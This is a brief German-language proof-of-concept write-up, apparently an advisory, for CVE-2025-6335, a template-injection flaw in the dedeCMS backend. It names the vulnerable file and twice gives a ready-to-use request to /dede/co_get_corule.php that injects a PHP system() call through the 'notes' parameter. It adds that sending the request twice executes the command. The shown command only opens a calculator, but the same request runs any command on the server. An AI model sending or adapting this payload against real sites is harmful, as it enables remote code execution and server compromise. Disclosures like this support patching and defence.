
Proof-of-Concept-Exploit für CVE-2025-6335, eine Schwachstelle zur Befehlsausführung durch Template-Injection in dedeCMS 5.7 sp2, die beliebige Befehlsausführung über die Backend-Oberfläche ermöglicht.
Bug-Autor: Ewoji
Betroffene Version: dedeCMS < 5.7.2
Anbieter: Shanghai Zhuozhuo Network Technology Co., LTD
Software: dedeCMS
Schwachstellendateien:
/include/dedetag.class.phpNach der Installation, melden Sie sich im Backend an
Ausnutzen der Vorlage
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1. Zweimaliges Aufrufen führt zur BefehlsausführungÜberprüfen des Exploits:
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command